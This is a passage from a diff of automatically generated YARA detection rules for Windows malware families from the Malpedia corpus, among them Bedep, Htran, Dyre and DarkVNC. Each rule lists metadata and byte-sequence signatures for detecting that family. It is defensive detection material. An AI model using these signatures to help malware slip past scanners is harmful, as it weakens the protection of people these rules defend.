8d4c2408 50 e8???????? b91f000000 33c0 8d7c2431 c644243000 } + $sequence_6 = { ff15???????? 8bb424a8010000 8d4c240c 51 8bce } + $sequence_7 = { 5f 5e 5d 32c0 5b 81c424030000 c3 } + $sequence_8 = { 8d4c240c c68424a001000001 e8???????? 8d8c24ac010000 889c24a0010000 e8???????? } + $sequence_9 = { 6a00 ff15???????? 68d0070000 ff15???????? 8d94249c000000 6a00 } condition: - 7 of them and filesize <389120 + 7 of them and filesize <81920 } -rule MALPEDIA_Win_Spedear_Auto : FILE +rule MALPEDIA_Win_Bedep_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "064ca511-db37-50e7-a5f5-98bdd145296d" + id = "38514c33-d67a-59ce-9042-a62977e3ef09" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spedear_auto.yar#L1-L246" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bedep_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "3ab20c94a066f6f4783dff8cb4bf09780239780b3bd9f55c80bdf4166aa7a997" + logic_hash = "f62533daae7175b045e5c4c81adb2d2dce588f3fcc3da789cd782a4e3103423f" score = 75 - quality = 71 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -185285,50 +188113,34 @@ rule MALPEDIA_Win_Spedear_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83e207 03c2 c1f803 83c40c } - $sequence_1 = { 8b4718 8a5f06 50 894608 e8???????? } - $sequence_2 = { 53 50 e8???????? 8b7e0c 895e10 } - $sequence_3 = { 894618 ffd7 89461c 5f } - $sequence_4 = { 33f6 8b4704 8b4f08 53 50 8bde e8???????? } - $sequence_5 = { 8b44240c 8b08 8b442410 53 55 } - $sequence_6 = { c1e208 40 0bca 3bc3 7c02 } - $sequence_7 = { 5b c20400 8b4c240c 57 53 51 } - $sequence_8 = { 6a00 68???????? e8???????? 83c40c 68d0070000 } - $sequence_9 = { 833e00 741e 8b5608 8b4604 6a00 } - $sequence_10 = { 833e00 741a 6a00 6a00 ff7608 } - $sequence_11 = { 6a00 ff7608 ff5604 6800800000 } - $sequence_12 = { 394878 7456 39487c 7451 } - $sequence_13 = { 8bc7 5e 5f 5b 5d c3 6a08 } - $sequence_14 = { ff5604 6800800000 6a00 ff7608 } - $sequence_15 = { 74ce 56 53 ff7510 ff75d8 6a00 6a00 } - $sequence_16 = { 4154 4883ec20 4c8b5120 4d8be0 488bea 410fb74206 488bf1 } - $sequence_17 = { 418d5001 488bcf 4803c7 48894308 } - $sequence_18 = { 50 8d4de0 e8???????? 83781410 59 5b 7202 } - $sequence_19 = { 750b 488bcf ff15???????? eb07 488bd5 } - $sequence_20 = { 488bc3 488d152bd50000 48c1f805 83e11f 488b04c2 486bc958 } - $sequence_21 = { 723a 488d05349b0000 483bd8 772e } - $sequence_22 = { 488364242000 40886c245c 488d0d10d10000 4c8d4c244c } - $sequence_23 = { 8a80b4182400 08443b1d 0fb64601 47 3bf8 76ea } - $sequence_24 = { 4883ec20 488d05fe690000 488bfa 488bd9 488901 } - $sequence_25 = { 488d15032e0000 488bce 488905???????? ff15???????? } + $sequence_0 = { 8b4dd4 c70020000000 c7400421020000 8bc6 881e c6460103 } + $sequence_1 = { 8b4608 e8???????? 85c0 7c19 6a20 8bc7 e8???????? } + $sequence_2 = { e8???????? 85c0 8945f4 7e3a 837df800 7463 8bcb } + $sequence_3 = { 33ff 89742418 8974241c 8b542418 56 ff742420 8d4c2430 } + $sequence_4 = { 7d09 56 e8???????? 59 eb05 8b450c 8930 } + $sequence_5 = { 397338 89442428 0f85bb000000 6a7c 8d8424a4000000 56 50 } + $sequence_6 = { 75e2 b001 5e c20400 55 8bec 83e4f8 } + $sequence_7 = { 56 90 e8???????? 832000 6a04 ff750c 33c9 } + $sequence_8 = { 8d4568 50 ff7570 90 e8???????? 894570 64a118000000 } + $sequence_9 = { ff751c 83cb02 ff7520 53 ff7514 50 8d45f4 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <557056 } -rule MALPEDIA_Win_Oldbait_Auto : FILE +rule MALPEDIA_Win_Htran_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ebf9fc57-4949-58c7-824e-3ca5b4d74ce5" + id = "640e7099-e79d-52c5-9d59-7736988066fb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.oldbait_auto.yar#L1-L228" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.htran_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "d1cd1bc5ec310d79468f4c2de84867d1b6cb0114c1b0bc749b36388cf16e7127" + logic_hash = "572147b50538386d2f3141669299b284d93907b072e98ae962e15d37b04a8bad" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -185340,46 +188152,32 @@ rule MALPEDIA_Win_Oldbait_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 05d4db1900 8945f4 ff35???????? ff75fc ff55f4 5f 5e } - $sequence_1 = { 8bec 8b450c 56 33d2 57 } - $sequence_2 = { 33d2 57 8b7d08 8d70ff 85f6 7626 } - $sequence_3 = { 01459c 8b45c8 8945f8 eb05 } - $sequence_4 = { 69c061ea0000 3571281424 42 3bd6 894510 72da } - $sequence_5 = { 0145d8 8bb54cffffff 56 ff55d0 } - $sequence_6 = { 0145d8 33ff 8d837ff61800 803800 } - $sequence_7 = { 0145d8 8b45f0 ff45ec 0fb64004 } - $sequence_8 = { 0531b11800 50 8b45f8 0531010000 50 } - $sequence_9 = { 0145d4 41 c1ea04 75dc } - $sequence_10 = { 837d2000 7432 66c7045f0d00 43 66c7045f0a00 43 } - $sequence_11 = { 0145d8 8b45d8 3b45c8 7cc2 } - $sequence_12 = { 83e107 d3e8 30043a 8b4510 69c061ea0000 3571281424 42 } - $sequence_13 = { 6a40 6800300000 68d4fd1900 6a00 } - $sequence_14 = { 894510 72da 8bc7 5f 5e } - $sequence_15 = { 0103 01451c 8b06 8bc8 c1e906 } - $sequence_16 = { 8b55fc 8a5d0f 8d4701 83e007 02d9 } - $sequence_17 = { 7439 8d85bcfdffff 68???????? 50 } - $sequence_18 = { ffd6 68???????? 53 8945f0 ffd6 6a64 } - $sequence_19 = { 50 e8???????? ff75f4 8d8578ffffff 68???????? } - $sequence_20 = { ffd6 ffd0 8d85c0feffff 50 8d85bcfdffff } - $sequence_21 = { 8945ec ff7508 6a01 6a00 6a00 } - $sequence_22 = { 8d4df4 8945d4 51 57 50 } - $sequence_23 = { 57 50 53 68???????? ff35???????? ffd6 ffd0 } + $sequence_0 = { 6a00 8d8434f0a20000 55 50 53 } + $sequence_1 = { 8bc8 83e103 f3a4 8b4c2462 } + $sequence_2 = { 83c408 a1???????? 85c0 7405 } + $sequence_3 = { 50 51 ffd3 85c0 7d28 bf???????? 83c9ff } + $sequence_4 = { ffd5 8bf8 8b442440 50 ff15???????? 50 53 } + $sequence_5 = { 8b8424e0420100 33c9 894c2414 53 8b10 } + $sequence_6 = { 8816 46 eb0f 0fb6d2 f682c1c3400004 } + $sequence_7 = { 89442410 c705????????03000000 8b442410 8b0d???????? 49 743a } + $sequence_8 = { c20400 8b542404 8b0d???????? 3915???????? 56 b8???????? } + $sequence_9 = { 899424e8010000 89b424e8000000 899424e4000000 33c0 8d8c24e8000000 } condition: - 7 of them and filesize <172032 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Safenet_Auto : FILE +rule MALPEDIA_Win_Himan_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ac7a694f-f64f-5870-a7d7-8253326e6bdf" + id = "a882d092-072a-5641-b214-8642f7cc1e11" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.safenet" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.safenet_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.himan_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "2a23436dc4bc12ef6d7e9d46230626c8fc77e510b9c9904c537608f099e6c2ff" + logic_hash = "bf239bbd05c563f996119e72de32999d711849487b106db1285219d82e77b92b" score = 75 quality = 75 tags = "FILE" @@ -185393,32 +188191,32 @@ rule MALPEDIA_Win_Safenet_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4004 50 c3 8b442404 668b08 } - $sequence_1 = { 50 ff15???????? 85c0 7511 6a01 5b } - $sequence_2 = { 57 8d45e6 6a02 50 e8???????? 836d0804 83c420 } - $sequence_3 = { 8b08 50 897920 8b4df0 83602000 e8???????? } - $sequence_4 = { ff7008 ff7604 ff15???????? 8bcf e8???????? } - $sequence_5 = { 8d4db8 c645fc01 e8???????? 6a01 8d4dcc 885dfc } - $sequence_6 = { 57 ff7614 ff55f8 85c0 0f85d7000000 397df4 } - $sequence_7 = { ffd6 83c414 8d85b0fbffff ff77f8 } - $sequence_8 = { ff750c e8???????? ff75ec e8???????? ff75e8 e8???????? } - $sequence_9 = { bf???????? 8b45d4 85c0 7505 b8???????? 57 50 } + $sequence_0 = { 8b7b04 33ee 8b7068 0554010000 c1e204 33f7 } + $sequence_1 = { 8b442410 3bd0 7422 56 ff15???????? 57 ff15???????? } + $sequence_2 = { 894c2414 8bcb c1e910 81e1ff000000 } + $sequence_3 = { c1e008 0bc7 c1e008 0bc1 8bc8 8904b594886e00 } + $sequence_4 = { 8bda c1eb18 8b2cad948c6e00 332c9d94946e00 8bd9 c1eb10 81e3ff000000 } + $sequence_5 = { 8b08 50 ff5108 8b8c24a8050000 5f } + $sequence_6 = { 8d85a0fcffff 50 ff15???????? 8da594d4ffff 5f 5e 5b } + $sequence_7 = { c1e910 3334adbcc26e00 8beb 81e5ff000000 81e1ff000000 c1eb08 3334adbcba6e00 } + $sequence_8 = { 333c9594946e00 8b542414 c1ea10 81e2ff000000 333c9594906e00 8bd1 81e2ff000000 } + $sequence_9 = { c1c108 890cb5948c6e00 8a8ebccb6e00 8bd0 884c2410 8b7c2410 c1c210 } condition: - 7 of them and filesize <262144 + 7 of them and filesize <139264 } -rule MALPEDIA_Win_8T_Dropper_Auto : FILE +rule MALPEDIA_Win_Stabuniq_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "62f20b6c-23f8-52e5-8f38-7d977c3fc023" + id = "fc58cf81-e26c-5be2-91a6-3fbb3fc72d52" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.8t_dropper_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stabuniq_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "f24ad3d6bfd5a20c8c809ac43affb0600d938cb9b1cb9cd8c47771e603e82a25" + logic_hash = "97aa7344abd98ffc46d944f3c78f102b277bbba8d700aca31756ce2df1f26cfc" score = 75 quality = 75 tags = "FILE" @@ -185432,32 +188230,32 @@ rule MALPEDIA_Win_8T_Dropper_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 741b 56 6800700000 6a01 68???????? } - $sequence_1 = { ff74240c e8???????? 83c40c c3 8b442408 83f801 } - $sequence_2 = { c6440c0e6e 8d4c2408 51 683f000f00 50 } - $sequence_3 = { 68???????? 50 ff15???????? 85c0 7559 8b4c2408 51 } - $sequence_4 = { 50 ff15???????? 85c0 7559 8b4c2408 } - $sequence_5 = { 49 c6440c0c52 c6440c0d75 c6440c0e6e } - $sequence_6 = { 68???????? 6a02 50 8b442418 } - $sequence_7 = { 7559 8b4c2408 51 ff15???????? } - $sequence_8 = { 6800700000 6a01 68???????? e8???????? 56 e8???????? } - $sequence_9 = { ff15???????? 8d942410010000 6804010000 52 68???????? } + $sequence_0 = { 50 8b4d08 ff91a8000000 6a00 6a00 } + $sequence_1 = { 8b8df4feffff 51 6aff 8b5508 81c2a2050000 } + $sequence_2 = { 52 8b4510 ff503c 8b4d10 33d2 668b9106020000 } + $sequence_3 = { 6a00 8b4d08 8b91f8010000 52 8b4508 ff9018010000 837de4ff } + $sequence_4 = { 8985c8fbffff 8b4d14 51 6a08 8b550c } + $sequence_5 = { 8b4df8 8b11 035508 8955f4 eb0c 8b45f8 8b4810 } + $sequence_6 = { 51 e8???????? 8b5508 83c220 895508 c785bcfcffff00000000 8b4510 } + $sequence_7 = { 51 8b550c ff524c 8945fc 8b45fc 50 } + $sequence_8 = { 8d85c0fcffff 50 8b4d0c 51 e8???????? eb16 8b5510 } + $sequence_9 = { 81c155030000 51 e8???????? 6a00 8b5514 52 8b85e8feffff } condition: - 7 of them and filesize <147456 + 7 of them and filesize <57344 } -rule MALPEDIA_Win_Stowaway_Auto : FILE +rule MALPEDIA_Win_Dyre_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e2cf60b5-46e1-5dce-b54e-4eae51e51190" + id = "a2cdb89d-a2b8-54db-b921-a02d048236a7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stowaway_auto.yar#L1-L110" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dyre_auto.yar#L1-L170" license_url = "N/A" - logic_hash = "ba9de78202a4b50e7d737f5edb3449679cab84813a913aa4817b5b87ab2181a8" + logic_hash = "e9097ad46c004cb1ae831fc1ba01674dc80d073ddf943ce6f2fcdbae48599a8a" score = 75 quality = 75 tags = "FILE" @@ -185471,31 +188269,38 @@ rule MALPEDIA_Win_Stowaway_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b07 09c0 743c 8b5f04 } - $sequence_1 = { 09c0 7407 8903 83c304 ebe1 } - $sequence_2 = { 50 54 6a04 53 57 ffd5 8d879f010000 } - $sequence_3 = { 89f9 57 48 f2ae 55 } - $sequence_4 = { 8d879f010000 80207f 8060287f 58 50 } - $sequence_5 = { 95 8a07 47 08c0 74dc 89f9 57 } - $sequence_6 = { 76e8 77e8 78e8 79e8 } - $sequence_7 = { 8a7cbe46 a3???????? 4e fb b501 } - $sequence_8 = { 78e8 79e8 7ae8 ce f67be8 7ce8 7de8 } + $sequence_0 = { 6814020000 e8???????? 59 c3 } + $sequence_1 = { e9???????? 68f4010000 ff15???????? 56 } + $sequence_2 = { 7244 6801010000 ff15???????? 8b4d18 663901 } + $sequence_3 = { 7502 c9 c3 33c0 837dfc20 } + $sequence_4 = { 0fb7c8 c1e110 e8???????? 0fb7c0 0bc1 c9 c3 } + $sequence_5 = { 773d 0fbec0 83e857 8ada 2ad9 c1e004 80fb09 } + $sequence_6 = { c1fa02 8b1496 83e103 c1e103 } + $sequence_7 = { 41 3bc8 7cf4 83f903 } + $sequence_8 = { 57 4883ec20 4032ff 488bda 8bf1 4885d2 } + $sequence_9 = { 488bc8 ff15???????? 85c0 7455 4c8d442434 } + $sequence_10 = { 488bcb e8???????? 4c8d5e01 41b8f7ffffff 6666660f1f840000000000 488bcf 418d4008 } + $sequence_11 = { 4433c0 418bc5 23c6 33c8 418bc1 4403c1 } + $sequence_12 = { 663907 7530 8b4604 394704 7528 8b4608 394708 } + $sequence_13 = { 498d43e8 33ff 488bf2 498943d8 498d4318 488bd9 488bd1 } + $sequence_14 = { 440fb69c249f000000 0fb68c249d000000 0fb694249c000000 440fb694249b000000 } + $sequence_15 = { 488bcb e8???????? 85c0 750d 33c0 488b5c2430 } condition: - 7 of them and filesize <8003584 + 7 of them and filesize <590848 } -rule MALPEDIA_Win_Govrat_Auto : FILE +rule MALPEDIA_Win_Datper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1d47ae50-0c56-5989-81a0-8fdce95f6d20" + id = "144df714-10f7-5eb5-ac00-48d1c0a0517d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.govrat_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.datper_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "fd342f7d8be9492612f2ff02091e469b143bdad77d63d3ee372225f78d66c202" + logic_hash = "96f11afeb919508bb147708a5d367711547bdbf470c62d9b42f3889c5cdbbcd4" score = 75 quality = 75 tags = "FILE" @@ -185509,34 +188314,34 @@ rule MALPEDIA_Win_Govrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7725 0fb74002 8d709f 6683fe19 7702 03c2 6685c0 } - $sequence_1 = { ff37 e8???????? 894620 85c0 7507 b80e000780 5f } - $sequence_2 = { e8???????? 83ec1c 8bf4 8965b4 } - $sequence_3 = { e8???????? 6aff 53 8d4db0 51 c645fc06 e8???????? } - $sequence_4 = { 837dc808 8b75b4 7303 8d75b4 53 51 68???????? } - $sequence_5 = { 8d7c2428 ab ab 7548 8d442464 50 } - $sequence_6 = { 0183f0bc0300 8393f4bc030000 e8???????? eb1d 8b45fc 2b45f0 ff75fc } - $sequence_7 = { 7311 c70485????????e8814300 40 a3???????? c3 55 8bec } - $sequence_8 = { 83ec18 56 8bf1 8b4610 8955f8 8945f4 83f804 } - $sequence_9 = { 85f6 7403 832600 837d1000 0f8690000000 8b5d08 } + $sequence_0 = { 33c9 ba0c000000 e8???????? c78564d7ffff0c000000 33c0 898568d7ffff } + $sequence_1 = { 5a 59 59 648910 68???????? 8d85e8f3ffff } + $sequence_2 = { 0fb607 8845f7 0fb6c1 8b55fc 0fb60402 8807 } + $sequence_3 = { 50 ff15???????? 85c0 741f 8b8424a80d0000 894348 } + $sequence_4 = { 895de4 895de8 895df4 894df0 8955f8 8945fc 8d45fc } + $sequence_5 = { 53 e8???????? a3???????? 8d95a8fbffff b8???????? e8???????? 8b85a8fbffff } + $sequence_6 = { c78568d7ffff0c000000 33c0 89856cd7ffff c78570d7ffffffffffff 6a00 6a01 8d8568d7ffff } + $sequence_7 = { 8b45fc e8???????? 50 e8???????? 8d8564d7ffff 33c9 ba0c000000 } + $sequence_8 = { 8d85f0fbffff 50 53 e8???????? 8945f0 a1???????? 50 } + $sequence_9 = { 53 e8???????? 6800800000 6a00 56 } condition: - 7 of them and filesize <761856 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Maktub_Auto : FILE +rule MALPEDIA_Win_Badhatch_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e3bef5b1-ffc5-599d-9917-312a2370b890" + id = "e8145868-3ca1-5c30-b22c-ef0d5f024b54" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.maktub_auto.yar#L1-L203" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.badhatch_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "e077a57d767e9de98d639131f563ec23078961a903d866aaf47969e99e6c3d2f" + logic_hash = "a465c1cdccc061411fd4300f0446fb5369592ae409bf62acf36666de581c3980" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -185548,44 +188353,32 @@ rule MALPEDIA_Win_Maktub_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd0 f7d8 1bc0 f7d8 8be5 } - $sequence_1 = { c7450c00000000 50 6a01 56 } - $sequence_2 = { ff30 8b86a4000000 ffd0 8b75b4 } - $sequence_3 = { ff30 8b83a4000000 ffd0 8b75d4 } - $sequence_4 = { ff7508 ffd7 50 ffd6 53 8b5d08 6af4 } - $sequence_5 = { ff30 8b8690000000 6a00 ffd0 } - $sequence_6 = { ff30 8b4704 6a00 56 ffd0 85c0 } - $sequence_7 = { c74508???????? e9???????? 50 ff15???????? 85c0 7f1e a1???????? } - $sequence_8 = { ff7004 ff30 e8???????? 8bc7 5f 5e } - $sequence_9 = { f8 39dc f5 f7de } - $sequence_10 = { f8 57 c64424084b 88442404 } - $sequence_11 = { f8 60 0145e0 f8 } - $sequence_12 = { f8 50 55 660fa3d5 } - $sequence_13 = { 8d4f0c e8???????? 8d4de8 e8???????? } - $sequence_14 = { 8d4f04 8b01 ff7508 ff5010 8bd8 } - $sequence_15 = { f8 3a07 6868c51b01 8d7f01 } - $sequence_16 = { 8d4f04 8b45f4 8b31 2bc2 } - $sequence_17 = { 8d4f04 e8???????? 8d5608 8d4f08 } - $sequence_18 = { 8d4f08 e8???????? 8d560c 8d4f0c e8???????? } - $sequence_19 = { 8d4f0c e8???????? 5f 5e 5d c20400 } - $sequence_20 = { f8 12644a00 40 d4b5 } - $sequence_21 = { 8d4f10 50 e8???????? 8d45f8 } + $sequence_0 = { 53 6a00 50 ffd7 56 6a00 ff35???????? } + $sequence_1 = { 8b7730 59 59 8975f0 85f6 7514 } + $sequence_2 = { 8bc7 99 0145e0 1155e4 eb0e } + $sequence_3 = { ff7618 ff15???????? 85c0 740e ff15???????? 8945e4 e9???????? } + $sequence_4 = { 8bf0 59 85f6 750e eb40 ff15???????? 8bf0 } + $sequence_5 = { 8945e4 ff45d0 e9???????? 395de4 0f8574060000 68???????? ff7618 } + $sequence_6 = { 50 ff15???????? 85c0 0f8524010000 8d45ec 50 8d8594f5ffff } + $sequence_7 = { 8bd8 48 83e90c 85db 75f1 5b } + $sequence_8 = { 5e c9 c3 55 8bec 83e4f8 81ec38020000 } + $sequence_9 = { 50 ff15???????? 8945ec 3bc3 7509 } condition: - 7 of them and filesize <3063808 + 7 of them and filesize <156672 } -rule MALPEDIA_Win_Xdspy_Auto : FILE +rule MALPEDIA_Win_Brutpos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "770ce833-e4ad-5e91-a2e8-e19a8fcb8719" + id = "bb6abccd-59b3-5a30-9e67-ccbe498737a5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xdspy_auto.yar#L1-L167" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.brutpos_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "f9c3ada66244c45df3d3dc2c6a2b3ef1f7e34e7bdca43fe98eeac2240819a0e8" + logic_hash = "89d0bc6a7e52ba9f63dface96ebbf483b03be0cbf8144ed32f3b88bf360b4eda" score = 75 quality = 75 tags = "FILE" @@ -185599,38 +188392,32 @@ rule MALPEDIA_Win_Xdspy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d45ec 50 ff35???????? e8???????? 83f8ff } - $sequence_1 = { ffb56cd8ffff 8d8570d8ffff 6800040000 6a01 50 e8???????? } - $sequence_2 = { 8b36 8bce c1f905 8b0c8d804e4100 } - $sequence_3 = { ff7580 8b3d???????? ffd7 8d4580 50 68???????? 56 } - $sequence_4 = { 8d45e0 50 57 8d85e02a0000 50 ff75dc ffd3 } - $sequence_5 = { 83c414 83c8ff e9???????? 8bc6 c1f805 57 8d3c85804e4100 } - $sequence_6 = { 8b4de0 8d0c8d804e4100 8901 8305????????20 } - $sequence_7 = { 8d8510ecffff 57 50 e8???????? ffb56cd8ffff } - $sequence_8 = { 0f1f4000 660f1f840000000000 420fb68431309b1700 88840db0080000 488d4901 } - $sequence_9 = { 488b15???????? 488d8da0080000 ffd0 660f6f0d???????? 488d3550331700 } - $sequence_10 = { c705????????67736666 c705????????6e747764 c705????????73752f65 66c705????????6d6d 488d1563121700 } - $sequence_11 = { 488d4901 84c0 75e8 80bd400c000000 488d85400c0000 7413 } - $sequence_12 = { 4883f860 7ccf 488d15f85c1700 488d0d41e60100 4c8d0552e60100 } - $sequence_13 = { fe08 488d4001 803800 75f5 488d8db0080000 ff15???????? } - $sequence_14 = { 83f9ff 0f8496010000 ba01000000 448d420f } - $sequence_15 = { 33c9 ff15???????? 48898424a8000000 660f6f05???????? } + $sequence_0 = { 59 58 83c004 83e904 8808 } + $sequence_1 = { 03c2 034508 2938 83e902 75e8 ebd9 5e } + $sequence_2 = { 8d5b18 8b5b60 03d8 52 8b35???????? } + $sequence_3 = { 6681f9df77 7412 0f31 8bd8 } + $sequence_4 = { 8bd0 ad 8bc8 83e908 66ad 6685c0 740c } + $sequence_5 = { 8d7c38fc baffffffff 83c704 57 } + $sequence_6 = { 66ad 6685c0 740c 25ff0f0000 03c2 034508 } + $sequence_7 = { 52 e8???????? 59 8b09 8bd1 } + $sequence_8 = { c1e202 03d3 8b12 03d0 } + $sequence_9 = { 8b5508 8b4204 0fb70a 50 51 807401ff97 } condition: - 7 of them and filesize <3244032 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Mindware_Auto : FILE +rule MALPEDIA_Win_Darkvnc_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "205d25dc-9d1d-5cfe-9a1e-fc1d20bf21d6" + id = "c383bb27-eefd-56e4-99f1-129a7cd0febf" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mindware" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mindware_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvnc" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkvnc_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "0229e104e7ced878ae1d5a8dad7ae14c8a1e11edebe2196883325f14972bfdf1" + logic_hash = "59a6ef1d2e391f7957c06b061626ceb22bd1c35faf4777593f7b9c101df055cb" score = 75 quality = 75 tags = "FILE" @@ -185644,32 +188431,32 @@ rule MALPEDIA_Win_Mindware_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 ff15???????? 8dbd48ffffff 32c0 b980000000 f3aa } - $sequence_1 = { c78530e9ffffeccc4300 c78534e9fffff4cc4300 c78538e9ffff0ccd4300 c7853ce9ffff18cd4300 c78540e9ffff38cd4300 c78544e9ffff40cd4300 c78548e9ffff4ccd4300 } - $sequence_2 = { c7857cf4ffff24e94300 c78580f4ffff38e94300 c78584f4ffff40e94300 c78588f4ffff48e94300 c7858cf4ffff58e94300 } - $sequence_3 = { c1e910 335808 0fb6c9 895df4 33148df0d04400 } - $sequence_4 = { 894dfc 89482c c1e918 897028 0fb699f0d84400 8b4dfc c1e910 } - $sequence_5 = { 0fb6c9 33148dc0c84400 335004 8b4dfc c1e908 8955e8 0fb6d1 } - $sequence_6 = { 8bec 837d0c00 764c e8???????? 0fb6c0 85c0 } - $sequence_7 = { 6a00 8b856cffffff 50 8b8d68ffffff 51 8b55bc 52 } - $sequence_8 = { c78530e6ffff5cc54300 c78534e6ffff68c54300 c78538e6ffff70c54300 c7853ce6ffff78c54300 c78540e6ffff88c54300 c78544e6ffff90c54300 c78548e6ffffa0c54300 } - $sequence_9 = { 33d2 034dc8 1355cc 894dc8 8955cc e9???????? 8b45dc } + $sequence_0 = { c1e904 4103ce 446bc11f 48634b28 418bd0 c1ea08 881401 } + $sequence_1 = { 488b4c2438 894148 c744244001000000 4c8b8c24a0000000 4c8b842498000000 8b942490000000 33c9 } + $sequence_2 = { 418bca d1e9 03c1 8a4d0c 99 41f7fa d3e0 } + $sequence_3 = { 41f7fb d2e0 41880432 49ffc2 4c3bd3 7ce5 488b5c2408 } + $sequence_4 = { 668944244c 488d4c2440 e8???????? 